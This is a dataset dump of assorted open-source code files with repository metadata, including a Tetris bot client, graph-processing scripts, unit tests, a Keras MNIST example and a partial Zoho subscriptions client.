max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
student.py | ricardombrodriguez/Tetris-AI-Bot | 0 | 12799051 | import asyncio
import getpass
import json
import os
import websockets
from shape import S, Z, I, O, J, T, L, Shape
from search import *
async def agent_loop(server_address="localhost:8000", agent_name="student"):
async with websockets.connect(f"ws://{server_address}/player") as websocket:
# Receive information about static game properties
await websocket.send(json.dumps({"cmd": "join", "name": agent_name}))
initial_info = json.loads(
await websocket.recv()
) # receive game update, this must be called timely or your game will get out of sync with the server
shapes_keys = shapesKeys(SHAPES,initial_info)
A = -0.510066
B = -0.184483
C = -0.35663
D = 0.760666
variables = [A,B,C,D]
new_piece = True #variavel para saber é uma nova peça e, assim, calcular a search tree
keys = [] # isto pode ser um array de arrays, cada sub-array é o conjunto de chaves para uma das peças especificas no lookahead
first_piece = True #quando está é true, temos de usar o search() e calcular as keys consoante o lookahead
all_keys = []
# grid = {(tup[0],tup[1]) for tup in initial_info['grid']}
# x = max(grid, key = lambda coord : coord[0])[0] + 1
# y = max(grid, key = lambda coord : coord[1])[1]
# print(x,y)
while True:
try:
state = json.loads(
await websocket.recv()
) # receive game update, this must be called timely or your game will get out of sync with the server
if keys:
await websocket.send(
json.dumps({"cmd": "key", "key": keys.pop(0)})
)
# Peça recebida
if 'piece' in state:
piece = state['piece']
next_pieces = state['next_pieces'] # apenas a prineira peça
game_speed = state['game_speed']
else:
piece = None
# A peça foi encaixada, não existindo nenhuma nova, por agora
if piece is None:
new_piece = True
# Nova peça
elif new_piece:
# Caso a peça faça parte do lookahead de uma peça anterior (só verifica se keys existe porque o pop das keys ja acontece acima)
if not first_piece:
# se todas as chaves/keys do lookahead já foram enviadas, então acabou e a próxima peça recebida vai fazer o search
if not all_keys:
first_piece = True
else:
new_piece = False
keys = all_keys.pop(0)
# Encontrar a melhor solução para a nova peça
elif first_piece:
current_shape = findShape(piece)
next_shapes = [findShape(shape) for shape in next_pieces]
shapes = None
if game_speed <= 25:
# lookahead 3
shapes = [current_shape] + next_shapes[:]
elif game_speed > 25 and game_speed < 32:
#lookahead 2
shapes = [current_shape] + next_shapes[:-1]
elif game_speed >= 32:
#lookahead 1
shapes = [current_shape] + next_shapes[:-2]
#shapes = [current_shape] + next_shapes[:-2]
s = Search(state,initial_info,shapes,variables,shapes_keys)
s.search()
all_keys = None
try:
all_keys = [sol.keys for sol in s.best_solution.solutions]
except:
all_keys = [["s"]]*len(shapes)
keys = all_keys.pop(0)
new_piece = False
first_piece = False
except websockets.exceptions.ConnectionClosedOK:
print("Server has cleanly disconnected us")
return
def shapesKeys(shapes, initial_info):
grid = {(tup[0],tup[1]) for tup in initial_info['grid']}
x = max(grid, key = lambda coord : coord[0])[0] + 1
shapekeys = dict() #dicionario q guarda shape+rotation e todas as teclas possiveis no tabuleiro deça peça para essa rotaçao
for fshape in shapes: # para cada shape existente vai descobrir TODAS as combinaçoes de teclas q podem ser premidas
fshape.set_pos((x - fshape.dimensions.x) / 2, 0)
for rot in range(0, len(fshape.plan)): # loop para fazer cada rotaçao da peça atual
_fs = copy(fshape)
_fs.rotate(rot)
min_x = min(_fs.positions, key=lambda coords: coords[0])[0]
max_x = max(_fs.positions, key=lambda coords: coords[0])[0]
name = _fs.name + str(rot)
# percorrer colunas [1,8]
for a in range(1, x-1):
x_differential = a - min_x
# dispensa soluções não válidas
if (x_differential + max_x >= x - 1):
break
keys = ["w"]*rot
keys += ["a"]*abs(x_differential) + ["s"] if x_differential < 0 else ["d"]*abs(x_differential) + ["s"]
shapekeys.setdefault(name, []).append(keys)
return shapekeys
def findShape(piece):
#S (done)
if piece[0][0] == piece[1][0] and piece[1][1] == piece[2][1] and piece[2][0] == piece[3][0]:
fshape = Shape(S)
#Z (done)
elif piece[0][0] == piece[2][0] and piece[1][1] == piece[2][1] and piece[1][0] == piece[3][0]:
fshape = Shape(Z)
#I (done)
elif piece[0][1] == piece[1][1] and piece[1][1] == piece[2][1] and piece[2][1] == piece[3][1]:
fshape = Shape(I)
#O (done)
elif piece[0][0] == piece[2][0] and piece[0][1] == piece[1][1] and piece[1][0] == piece[3][0] and piece[2][1] == piece[3][1]:
fshape = Shape(O)
#J (done)
elif piece[0][1] == piece[1][1] and piece[0][0] == piece[2][0] and piece[2][0] == piece[3][0]:
fshape = Shape(J)
#T (done)
elif piece[0][0] == piece[1][0] and piece[1][1] == piece[2][1] and piece[1][0] == piece[3][0]:
fshape = Shape(T)
#L (done)
elif piece[0][0] == piece[1][0] and piece[1][0] == piece[2][0] and piece[2][1] == piece[3][1]:
fshape = Shape(L)
return fshape
# DO NOT CHANGE THE LINES BELLOW
# You can change the default values using the command line, example:
# $ NAME='arrumador' python3 client.py
loop = asyncio.get_event_loop()
SERVER = os.environ.get("SERVER", "localhost")
PORT = os.environ.get("PORT", "8000")
NAME = os.environ.get("NAME", getpass.getuser())
loop.run_until_complete(agent_loop(f"{SERVER}:{PORT}", NAME)) | 2.890625 | 3 |
python/trans_graph.py | Juelin-Liu/GraphSetIntersection | 12 | 12799052 | import sys
import time
def gen_continuous_id_graph(inputFile, outputFile, isUndirected=False):
with open(inputFile, 'r') as fin, open(outputFile, 'w') as fout:
cur_idx = 0
idmap = {}
for line in fin:
if line.startswith('#') or line.startswith('%'):
continue
org_u,org_v = line.split()
if org_u not in idmap:
idmap[org_u] = cur_idx
cur_idx += 1
if org_v not in idmap:
idmap[org_v] = cur_idx
cur_idx += 1
u = idmap[org_u]
v = idmap[org_v]
fout.write(str(u) + '\t' + str(v) + '\n')
if isUndirected:
fout.write(str(v) + '\t' + str(u) + '\n')
print 'cur_idx=', cur_idx
def gen_orgorder_graph(inputFile, outputFile, isUndirected=False):
edges = []
org_id_map = {}
org_id_list = []
with open(inputFile, 'r') as fin:
for line in fin:
if line.startswith('#') or line.startswith('%'):
continue
org_u,org_v = line.split()
u = int(org_u)
v = int(org_v)
if (u not in org_id_map):
org_id_map[u] = u
org_id_list.append(u)
if (v not in org_id_map):
org_id_map[v] = v
org_id_list.append(v)
edges.append((u, v))
org_id_list.sort()
for i in xrange(len(org_id_list)):
org_id_map[org_id_list[i]] = i
for i in xrange(len(edges)):
u,v = org_id_map[edges[i][0]],org_id_map[edges[i][1]]
edges[i] = (u,v)
# edges.sort()
with open(outputFile, 'w') as fout:
for u,v in edges:
fout.write(str(u) + ' ' + str(v) + '\n')
if isUndirected:
fout.write(str(v) + ' ' + str(u) + '\n')
if __name__ == "__main__":
# get_types(sys.argv[1], sys.argv[2])
isUndirected = False
if (len(sys.argv) > 3 and sys.argv[3] == '-u'):
isUndirected = True
time_start = time.time()
gen_continuous_id_graph(sys.argv[1], sys.argv[2], isUndirected)
# gen_orgorder_graph(sys.argv[1], sys.argv[2], isUndirected)
time_end = time.time()
time_cost = (time_end - time_start) * 100.0
print 'time_cost = %.3fms' % time_cost | 2.625 | 3 |
blaze/tests/test_toplevel.py | davidfischer/blaze-core | 1 | 12799053 | import os.path
from blaze.test_utils import temp_dir
import blaze.toplevel as toplevel
from blaze.params import params
from blaze import dshape
from blaze.sources.chunked import CArraySource, CTableSource
from blaze.eclass import eclass
def test_open_carray():
with temp_dir() as temp:
# Create an array on disk
array_filename = os.path.join(temp, 'carray')
p = params(storage=array_filename)
ds = dshape('1,int32')
a = CArraySource([2], dshape=ds, params=p)
del a
# Open array with open function
uri = 'carray://' + array_filename
c = toplevel.open(uri)
assert c.datashape == ds
# Test delayed mode
c = toplevel.open(uri, eclass=eclass.delayed)
assert c.datashape == ds
def test_open_ctable():
with temp_dir() as temp:
# Create an table on disk
table_filename = os.path.join(temp, 'ctable')
p = params(storage=table_filename)
ds = dshape('1,{ x: int32; y: int32 }')
t = CTableSource(data=[(1, 1), (2, 2)], dshape=ds, params=p)
del t
# Open table with open function
uri = 'ctable://' + table_filename
c = toplevel.open(uri)
assert c.datashape == ds
# Test delayed mode
c = toplevel.open(uri, eclass=eclass.delayed)
assert c.datashape == ds
| 2.09375 | 2 |
xframes/cmp_rows.py | cchayden/xframes | 0 | 12799054 | <filename>xframes/cmp_rows.py
# Row comparison wrapper for ascending or descending comparison.
class CmpRows(object):
""" Comparison wrapper for a row.
Rows can be sorted on one or more columns, and each one
may be ascending or descending.
This class wraps the row, remembers the column indexes used for
comparing the rows, and each ones ascending/descending flag.
It provides the needed comparison functions for sorting.
Rows are assumed to be indexable collections of values.
Values may be any python type that itself is comparable.
The underlying python comparison functions are used on these values.
"""
def __init__(self, row, indexes, ascending):
""" Instantiate a wrapped row. """
self.row = row
self.indexes = indexes
self.ascending = ascending
def less(self, other):
""" True if self is less than other.
Comparison is reversed when a row is marked descending.
"""
for index, ascending in zip(self.indexes, self.ascending):
left = self.row[index]
right = other.row[index]
if left < right: return ascending
if left > right: return not ascending
return False
def greater(self, other):
""" True if self is greater than other.
Comparison is reversed when a row is marked descending.
"""
for index, ascending in zip(self.indexes, self.ascending):
left = self.row[index]
right = other.row[index]
if left > right: return ascending
if left < right: return not ascending
return False
def equal(self, other):
""" True when self is equal to other.
Only comparison fields are used in this test.
"""
for index in self.indexes:
left = self.row[index]
right = other.row[index]
if left > right: return False
if left < right: return False
return True
# These are the comparison interface
def __lt__(self, other):
return self.less(other)
def __gt__(self, other):
return self.greater(other)
def __eq__(self, other):
return self.equal(other)
def __le__(self, other):
return self.less(other) or self.equal(other)
def __ge__(self, other):
return self.greater(other) or self.equal(other)
def __ne__(self, other):
return not self.equal(other)
| 3.453125 | 3 |
projects/baby_driver/scripts/test_can_send.py | Citrusboa/firmware_xiv | 14 | 12799055 | <filename>projects/baby_driver/scripts/test_can_send.py
"""This Module Tests methods in can_send.py"""
# pylint: disable=unused-import
import unittest
from unittest.mock import patch, Mock
import can
import cantools
import can_util
from message_defs import BABYDRIVER_DEVICE_ID
from can_send import can_send_raw, load_dbc, can_send
class TestCanSendRaw(unittest.TestCase):
"""Tests functions in Babydriver's can_send module"""
@patch('can_util.send_message')
def test_can_send_raw_parameters(self, mock_send_message):
"""Tests accuracy of parameters passed into can_send_raw"""
# Stores parameters passed into can_util.send_message
# pylint: disable=attribute-defined-outside-init
self.msg_id = None
self.data = None
self.device_id = None
self.channel = None
# pylint: disable=missing-docstring
def parameter_test(msg_id, data, device_id=BABYDRIVER_DEVICE_ID, channel=None):
self.msg_id = msg_id
self.data = data
self.device_id = device_id
self.channel = channel
# Checks whether parameters passed into can_send_raw match
# parameters passed into parameter_test
mock_send_message.side_effect = parameter_test
can_send_raw(0, [10, 255, 0], BABYDRIVER_DEVICE_ID, None)
self.assertEqual(0, self.msg_id)
self.assertEqual([10, 255, 0], self.data)
self.assertEqual(BABYDRIVER_DEVICE_ID, self.device_id)
self.assertEqual(None, self.channel)
@patch('can_util.send_message')
def test_can_send_raw_fail(self, mock_send_message):
"""Tests that can_send_raw raises an Exception if CAN msg fails to send"""
mock_send_message.side_effect = can.CanError
mock_msg_id = 0
mock_data = [0, 0, 255]
self.assertRaises(Exception, can_send_raw, mock_msg_id, mock_data)
@patch('cantools.database.load_file')
def test_load_dbc_fail(self, mock_cantools_load_file):
"""Tests that load_dbc raises an Exception if no file is found"""
mock_cantools_load_file.side_effect = can.CanError
self.assertRaises(Exception, load_dbc, "./some-file-path")
@patch('cantools.database.load_file')
@patch('can_util.get_bus')
def test_can_send_parameters(self, mock_get_bus, mock_load_file):
"""Tests accuracy of paramters passed into can_send"""
# pylint: disable=attribute-defined-outside-init
self.arbitration_id = None
self.data = None
# pylint: disable=missing-docstring
def parameter_test(can_msg):
self.arbitration_id = can_msg.arbitration_id
self.data = can_msg.data
# Creates mock object with frame_id attribute and encode function
msg_obj = Mock()
msg_obj.frame_id = 1
msg_obj.encode.return_value = [1, 2]
# Calling bus.send() triggers parameter test
can_msg = Mock()
can_msg.send.return_value = 3
can_msg.send.side_effect = parameter_test
database = Mock()
database.get_message_by_name.return_value = msg_obj
mock_load_file.return_value = database
mock_get_bus.return_value = can_msg
# dbc_database must be initialized before using can_send
load_dbc("./some_file_path")
can_send("some message", "vcan0", time=20)
self.assertEqual(1, self.arbitration_id)
self.assertEqual(bytearray(b'\x01\x02'), self.data)
@patch('cantools.database.load_file')
def test_can_send_fail(self, mock_load_file):
"""Tests that can_send raises an Exception if msg_obj data cannot be encoded"""
msg_obj = Mock()
msg_obj.frame_id = 1
# An error is raised when msg_obj data is encoded
msg_obj.encode.side_effect = can.CanError
database = Mock()
database.get_message_by_name.return_value = msg_obj
mock_load_file.return_value = database
# dbc_database must be initialized before using can_send
load_dbc("./some_file_path")
self.assertRaises(Exception, can_send, "some message")
if __name__ == '__main__':
unittest.main()
| 2.375 | 2 |
cmkinitramfs/utils.py | lleseur/cmkinitramfs | 0 | 12799056 | """Module providing miscellaneous utilities used by cmkinitramfs"""
from __future__ import annotations
import functools
import hashlib
import os.path
# Function needed for python < 3.9
def removeprefix(string: str, prefix: str) -> str:
"""Remove a prefix from a string
Add support for :meth:`str.removeprefix` for Python < 3.9.
:param string: String to remove prefix from
:param prefix: Prefix to remove
"""
# return string.removeprefix(prefix)
if string.startswith(prefix):
return string[len(prefix):]
return string
def normpath(path: str) -> str:
"""Normalize path (actually eliminates double slashes)
:param path: Path to normalize
"""
return os.path.normpath(path).replace('//', '/')
@functools.lru_cache()
def hash_file(filepath: str, chunk_size: int = 65536) -> bytes:
"""Calculate the SHA512 of a file
:param filepath: Path of the file to hash
:param chunk_size: Number of bytes per chunk of file to hash
:return: File hash in a :class:`bytes` object
"""
sha512 = hashlib.sha512()
with open(filepath, 'rb') as src:
for chunk in iter(lambda: src.read(chunk_size), b''):
sha512.update(chunk)
return sha512.digest()
| 3.21875 | 3 |
constructer/major-tsv/getMajor_obj_TH_EN.py | marsDev31/KUnit | 1 | 12799057 | f = open("stdList.tsv").readlines()
obj = ""
data = []
for txtLine in f:
data = txtLine.split('\t')
obj += "{value:'" + data[0] + "', label:'"+ data[0] + " " + data[2] + " (" + data[1] + " " + data[3].replace('\n','') + ")'}," + "\n"
print(obj)
obj = str('['+ obj +']').replace(',]',']')
save = open("mahor_th_en.js", "w")
save.write(obj)
| 2.625 | 3 |
python_gui_tkinter/KALU/GARBAGE1/label_ckbtn.py | SayanGhoshBDA/code-backup | 16 | 12799058 | <reponame>SayanGhoshBDA/code-backup
from tkinter import StringVar, Tk, Label, Checkbutton, IntVar
def update_label():
if var.get() == 1:
label_text.set("On")
else:
label_text.set("Off")
window = Tk()
label_text = StringVar()
label = Label(window, textvariable=label_text)
label_text.set("Off")
var = IntVar()
check= Checkbutton(window, text="On", variable=var,
onvalue=1, offvalue=0, command=update_label)
label.pack()
check.pack(side="left")
window.mainloop()
| 3.15625 | 3 |
travellifestyleblog22/migrations/0009_remove_category_image.py | biareiam/travellifestyleblog | 0 | 12799059 | # Generated by Django 3.2 on 2022-04-08 15:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('travellifestyleblog22', '0008_alter_category_image'),
]
operations = [
migrations.RemoveField(
model_name='category',
name='image',
),
]
| 1.351563 | 1 |
Tensorflow/other/mnist_test.py | egesko/SideChannel-AdversarialAI | 4 | 12799060 | import os
os.environ['TF_CPP_MIN_LOG_LEVEL']= '2'
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.datasets import mnist
physical_devices = tf.config.list_physical_devices('GPU')
print(physical_devices)
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(-1, 28*28).astype("float32") / 255.0
x_test = x_test.reshape(-1, 28*28).astype("float32") / 255.0
#Sequential API
model = keras.Sequential(
[
layers.Dense(512,activation='relu'),
layers.Dense(216, activation = 'relu'),
layers.Dense(10)
]
)
model.compile(
loss= keras.losses.SparseCategoricalCrossentropy(from_logits=True),
optimizer=keras.optimizers.Adam(lr=0.001),
metrics=["accuracy"],
)
model.fit(x_train,y_train,batch_size=32,epochs=5,verbose=2)
model.evaluate(x_test, y_test, batch_size= 32, verbose=2)
| 2.546875 | 3 |
payments/urls.py | HimanshuAwasthi95/pune.pycon.org | 0 | 12799061 | from django.conf.urls import url
import payments.views
urlpatterns = [
url(r"^webhook/$", payments.views.webhook,
name="webhook"),
]
| 1.359375 | 1 |
tests/boardfarm_plugins/boardfarm_prplmesh/tests/beacon_report_query_and_response.py | SWRT-dev/easymesh | 0 | 12799062 | ###############################################################
# SPDX-License-Identifier: BSD-2-Clause-Patent
# SPDX-FileCopyrightText: 2020 the prplMesh contributors (see AUTHORS.md)
# This code is subject to the terms of the BSD+Patent license.
# See LICENSE file for more details.
###############################################################
from .prplmesh_base_test import PrplMeshBaseTest
from boardfarm.exceptions import SkipTest
from capi import tlv
from opts import debug
import time
class BeaconReportQueryAndResponse(PrplMeshBaseTest):
''' This test verifies that a MAUT with an associated STA responds
to a Beacon Metrics Query by sending a Beacon Report request to its associated STA,
receiving a response from the STA, and sending the contents of that response
in a Beacon Metrics Response message to the Controller '''
def runTest(self):
# Locate test participants
try:
sta = self.dev.wifi
agent = self.dev.DUT.agent_entity
controller = self.dev.lan.controller_entity
except AttributeError as ae:
raise SkipTest(ae)
sniffer = self.dev.DUT.wired_sniffer
sniffer.start(self.__class__.__name__ + "-" + self.dev.DUT.name)
# Step 3. MAUT sends Association Response frame to STA
sta.wifi_connect_check(agent.radios[0].vaps[0])
time.sleep(1)
debug("Send Associated STA Link Metrics Query message")
mid = controller.ucc_socket.dev_send_1905(
agent.mac, self.ieee1905['eMessageType']['ASSOCIATED_STA_LINK_METRICS_QUERY_MESSAGE'],
tlv(self.ieee1905['eTlvTypeMap']['TLV_STAMAC_ADDRESS_TYPE'], sta.mac))
time.sleep(5)
debug("STA sends a valid Association Request frame to MAUT")
self.check_log(agent,
"Send AssociatedStaLinkMetrics to controller, mid = {}".format(mid),
timeout=20)
self.check_cmdu_type_single("Associated STA Link Metrics Response", 0x800E,
agent.mac, controller.mac, mid)
# Step 4. Send Beacon Metrics Query to agent.
agent.radios[0].send_bwl_event(
"DATA RRM-BEACON-REP-RECEIVED {} channel=1 dialog_token=0 measurement_rep_mode=0 \
op_class=0 duration=50 rcpi=-80 rsni=10 bssid=aa: bb:cc:11:00:10".format(sta.mac))
'''- Operating Class field equal to 115
- Channel Number field equal to 255
- BSSID field equal to wildcard (0xFFFFFFFFFFFF)
- Reporting Detail equal to 2
- SSID length field equal to 0 (SSID field missing)
- Number of AP Channel Reports equal to 1
- Length of AP Channel Report equal to 0x03
- Operating Class in AP Channel Report equal to 115
- Channel List in AP Channel Report equal to 36 and 48 '''
beacon_query_tlv_val = "{sta_mac} ".format(sta_mac=sta.mac)
beacon_query_tlv_val += "{0x73 0xFF 0xFFFFFFFFFFFF 0x02 0x00 0x01 0x03 0x73 0x24 0x30}"
debug("Send Beacon Metrics Query from controller to agent.")
mid = controller.ucc_socket.dev_send_1905(
agent.mac, self.ieee1905['eMessageType']['BEACON_METRICS_QUERY_MESSAGE'],
tlv(self.ieee1905['eTlvTypeMap']['TLV_BEACON_METRICS_QUERY'],
beacon_query_tlv_val))
# Step 5. Verify that MAUT sends a 1905 ACK to Controller.
time.sleep(1)
self.check_cmdu_type_single(
"ACK", self.ieee1905['eMessageType']['ACK_MESSAGE'], agent.mac, controller.mac, mid)
debug("Confirming ACK message was received.")
# Step 6. Verify that MAUT sends a correct Beacon request to STA.
time.sleep(1)
self.check_log(agent.radios[0], r"BEACON_METRICS_QUERY")
debug("Confirming that MAUT sends a Beacon request to STA.")
# Step 7. STA responds with Beacon report
time.sleep(1)
self.check_log(controller, r"got beacon response from STA. mid:", timeout=10)
# Step 8. MAUT sends Beacon Metrics Response to Controller
beacon_resp = self.check_cmdu_type_single(
"Agent send Beacon Response to controller.",
self.ieee1905['eMessageType']['BEACON_METRICS_RESPONSE_MESSAGE'],
agent.mac, controller.mac)
debug("Confirming MAUT sends Beacon Metrics Response to Controller.")
beacon_resp_tlv = self.check_cmdu_has_tlv_single(beacon_resp, 154)
''' Don't check Beacon Metrics measurement report, as it's always empty
https://jira.prplfoundation.org/browse/PPM-52 '''
assert beacon_resp_tlv.beacon_metrics_mac_addr == sta.mac, \
"Wrong beacon metrics mac addr in Beacon Respond"
sta.wifi_disconnect(agent.radios[0].vaps[0])
| 2.265625 | 2 |
tests/Monkeypatching/test_Api_monkeypatching_api_delete.py | LudwikaMalinowska/Automated-Testing-Project2 | 0 | 12799063 | import unittest
import requests
from assertpy import assert_that
from requests.exceptions import Timeout
from unittest.mock import Mock, patch
from src.Api import Api
from src.todos import todos
class TestApiMonkeyPatch(unittest.TestCase):
@patch('src.Api.Api', autospec=True)
def test_method_api_delete_raises_timeout(self, mock_class):
mock_id = Mock()
mock_id.return_value = 1
mock_class.api_delete.side_effect = Timeout
with self.assertRaises(Timeout):
mock_class.api_delete(mock_id)
def test_method_api_delete_assert_that_called_once(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete(mock_id)
mock_api.api_delete.assert_called_once()
def test_method_api_delete_assert_that_called(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_delete(mock_id)
mock_api.api_delete(mock_id2)
mock_api.api_delete.assert_called()
def test_method_api_delete_assert_that_not_called(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete.assert_not_called()
def test_method_api_delete_assert_that_called_with_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete(mock_id)
mock_api.api_delete.assert_called_with(mock_id)
def test_method_api_delete_assert_that_called_once_with_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete(mock_id)
mock_api.api_delete.assert_called_once_with(mock_id)
def test_method_api_delete_assert_that_response_has_status_code_200(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response).has_status_code(200)
def test_method_api_delete_assert_that_response_status_code_is_not_200(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"status_code": 408}
response = mock_api.api_delete(todo_id)
assert_that(response["status_code"]).is_not_equal_to(200)
def test_method_api_delete_assert_that_response_is_instance_of_dict(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response).is_instance_of(dict)
def test_method_api_delete_assert_that_response_has_key_delete_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response).has_delete_id(1)
def test_method_api_delete_assert_that_response_returns_deleted_data(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response["deleted_data"]).is_equal_to(todos[0])
def test_method_api_delete_assert_that_response_deleted_data_contain_all_keys_userId_id_title_completed(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_delete.return_value = {"delete_id": todo_id,
"deleted_data": todos[todo_id - 1],
"status_code": 200}
response = mock_api.api_delete(todo_id)
assert_that(response["deleted_data"]).contains_key("userId", "id", "title", "completed")
def test_method_api_delete_assert_that_not_called_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_delete(mock_id)
with self.assertRaises(AssertionError):
mock_api.api_delete.assert_not_called()
def test_method_api_delete_assert_that_called_once_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_delete(mock_id)
mock_api.api_delete(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_delete.assert_called_once()
def test_method_api_delete_assert_that_called_with_id_1_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_delete(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_delete.assert_called_with(mock_id)
def test_method_api_delete_assert_that_called_once_with_id_1_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_delete(mock_id)
mock_api.api_delete(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_delete.assert_called_once_with(mock_id)
def test_method_api_delete_no_parameter_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
with self.assertRaises(TypeError):
mock_api.api_delete()
def test_method_api_delete_assert_that_response_returns_ValueError_when_called_with_id_0_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 0
mock_api.api_delete.return_value = {"status_code": 408}
mock_api.api_delete.side_effect = ValueError
assert_that(mock_api.api_delete).raises(ValueError).when_called_with(todo_id)
def test_method_api_delete_assert_that_response_returns_ValueError_when_called_with_id_300_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 300
mock_api.api_delete.return_value = {"status_code": 408}
mock_api.api_delete.side_effect = ValueError
assert_that(mock_api.api_delete).raises(ValueError).when_called_with(todo_id)
def test_method_api_delete_assert_that_response_returns_TypeError_when_called_with_id_not_int_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = "1"
mock_api.api_delete.return_value = {"status_code": 408}
mock_api.api_delete.side_effect = TypeError
assert_that(mock_api.api_delete).raises(TypeError).when_called_with(todo_id)
def test_method_api_delete_assert_that_response_returns_AttributeError_when_called_with_None_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = None
mock_api.api_delete.return_value = {"status_code": 408}
mock_api.api_delete.side_effect = AttributeError
assert_that(mock_api.api_delete).raises(AttributeError).when_called_with(todo_id)
if __name__ == '__main__':
unittest.main() | 2.609375 | 3 |
leetcode/valid_mountain_array.py | Nyior/algorithms-and-datastructures-python | 1 | 12799064 | """
Given an array of integers arr, return true if and only if it is a valid mountain array.
Recall that arr is a mountain array if and only if:
arr.length >= 3
There exists some i with 0 < i < arr.length - 1 such that:
arr[0] < arr[1] < ... < arr[i - 1] < arr[i]
arr[i] > arr[i + 1] > ... > arr[arr.length - 1]
"""
from typing import List
def validMountainArray(arr: List[int]) -> bool:
if len(arr) < 3:
return False
peak_index = 0
n = len(arr)
for i in range(n-1):
if arr[i] >= arr[i+1]:
peak_index = i
break
if peak_index == 0:
return False
for i in range(peak_index, n-1):
if arr[i] <= arr[i+1]:
return False
return True | 4.28125 | 4 |
mod_dnase_score.py | aniketk21/tfbs-prediction | 2 | 12799065 | <gh_stars>1-10
'''
mod_dnase_score.py
usage: python mod_dnase_score.py bedgraph_file.bedgraph dataset.dat output.dat
modify the DNASE score.
'''
import sys
bed = open(sys.argv[1])
inp = open(sys.argv[2])
out = open(sys.argv[3], 'w')
inpl = inp.readlines()
bedl = bed.readlines()
for i in xrange(len(bedl)):
bedl[i] = bedl[i].split()
for i in xrange(len(inpl)):
inpl[i] = inpl[i].split()
print('Length of ' + sys.argv[1] + ': ' + str(len(bedl)))
print('Length of ' + sys.argv[2] + ': ' + str(len(inpl)))
cnt = 0
i = 0
line = ''
for el in bedl:
low = int(el[1])
high = int(el[2])
dnase = el[3]
while True:
elem = inpl[i]
if int(elem[1]) <= high:
line += str(elem[0]) + '\t' + str(elem[1]) + '\t' + str(elem[2]) + '\t' + str(elem[3]) + '\t' + str(elem[4]) + '\t' + str(dnase) + '\t' + str(elem[6]) + '\n'
i += 1
if i == len(inpl):
break
else:
break
if i == len(inpl):
break
cnt += 1
for j in range(i, len(inpl)):
elem = inpl[j]
line += str(elem[0]) + '\t' + str(elem[1]) + '\t' + str(elem[2]) + '\t' + str(elem[3]) + '\t' + str(elem[4]) + '\t' + '0' + '\t' + str(elem[6]) + '\n'
out.write(line)
print('Length of ' + sys.argv[3] + ': ' + str(line.count('\n')))
inp.close()
bed.close()
out.close()
| 2.75 | 3 |
src/craftr/core/impl/actions/LambdaAction.py | craftr-build/craftr-core | 64 | 12799066 |
import dataclasses
import typing as t
from craftr.core.base import Action, ActionContext
@dataclasses.dataclass
class LambdaAction(Action):
delegate: t.Callable[[ActionContext], None]
def execute(self, context: ActionContext) -> None:
self.delegate(context)
| 2.171875 | 2 |
zoho_subscriptions/subscriptions/plan.py | st8st8/django-zoho-subscriptions | 0 | 12799067 | <gh_stars>0
import ast
from requests import HTTPError
from zoho_subscriptions.client.client import Client
from zoho_subscriptions.subscriptions.addon import Addon
try:
from django.conf import settings as configuration
except ImportError:
try:
import config as configuration
except ImportError:
print("Zoho configurations not found in config/django settings, must be passed while initializing")
class Plan:
add_on_types = ['recurring', 'one_time', ]
def __init__(self, config=None):
if config is None:
self.client = Client(configuration.ZOHO_SUBSCRIPTION_CONFIG)
else:
self.client = Client(config)
def list_plans(self, filters=None, with_add_ons=True, add_on_type=None):
cache_key = 'plans'
response = self.client.get_from_cache(cache_key)
if response is None:
list_of_plan_uri = 'plans'
result = self.client.send_request("GET", list_of_plan_uri)
response = result['plans']
